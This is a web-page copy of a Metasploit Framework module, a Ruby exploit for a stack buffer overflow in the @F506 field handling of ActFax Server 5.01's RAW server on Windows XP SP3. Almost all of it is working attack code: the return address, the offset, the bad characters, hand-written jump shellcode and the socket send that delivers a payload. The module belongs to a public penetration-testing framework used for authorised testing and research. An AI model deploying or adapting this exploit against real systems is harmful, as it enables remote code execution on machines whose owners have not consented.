Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/misc/actfax_raw_server_bof.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name'	=> 'ActFax 5.01 RAW Server Buffer Overflow',

16
        'Description'	=> %q{

17
          This module exploits a vulnerability in ActFax Server 5.01 RAW server. The RAW

18
          Server can be used to transfer fax messages without any underlying protocols. To

19
          note significant fields in the fax being transferred, like the fax number or the

20
          recipient, ActFax data fields can be used. This module exploits a buffer overflow

21
          in the handling of the @F506 fields due to the insecure usage of strcpy. This

22
          module has been tested successfully on ActFax 5.01 over Windows XP SP3 (English).

23
        },

24
        'License'	=> MSF_LICENSE,

25
        'Author' => [

26
          'Craig Freyman', # @cd1zz # discovery and Metasploit module

27
          'corelanc0d3r', # Metasploit module

28
          'juan vazquez' # Metasploit module cleanup

29
        ],

30
        'References' => [

31
          [ 'OSVDB', '89944' ],

32
          [ 'BID', '57789' ],

33
          [ 'EDB', '24467' ],

34
          [ 'URL', 'http://www.pwnag3.com/2013/02/actfax-raw-server-exploit.html' ]

35
        ],

36
        'Platform'	=> 'win',

37
        'Payload' => {

38
          'BadChars' => (0x00..0x1f).to_a.pack("C*") + "\x40",

39
          'DisableNops' => true,

40
          'Space' => 1024,

41
          'EncoderOptions' =>

42
              {

43
                'BufferRegister' => 'ECX'

44
              }

45
        },

46
        'Targets' => [

47
          [

48
            'ActFax 5.01 / Windows XP SP3',

49
            {

50
              'Ret' =>	0x77c35459, # push esp # ret # msvcrt.dll

51
              'Offset'	=>	1024

52
            }

53
          ],

54
        ],

55
        'Privileged'	=> false,

56
        'DisclosureDate' => '2013-02-05',

57
        'DefaultTarget'	=> 0,

58
        'Notes' => {

59
          'Reliability' => UNKNOWN_RELIABILITY,

60
          'Stability' => UNKNOWN_STABILITY,

61
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

62
        }

63
      )

64
    )

65
  end

66


67
  def exploit

68
    connect

69
    p = payload.encoded

70
    buffer = p

71
    buffer << rand_text(target['Offset'] - p.length)

72
    buffer << [target.ret].pack("V")

73
    buffer << "\x89\xe1" # mov ecx, esp

74
    buffer << "\x81\xC1\xFC\xFB\xFF\xFF" # add ecx, -1028

75
    buffer << "\x81\xC4\x6C\xEE\xFF\xFF" # add esp, -4500

76
    buffer << "\xE9\xE9\xFB\xFF\xFF" # jmp $-1042

77
    print_status("Trying target #{target.name}...")

78
    sock.put("@F506 " + buffer + "@\r\n\r\n")

79
    disconnect

80
  end

81
end

82


83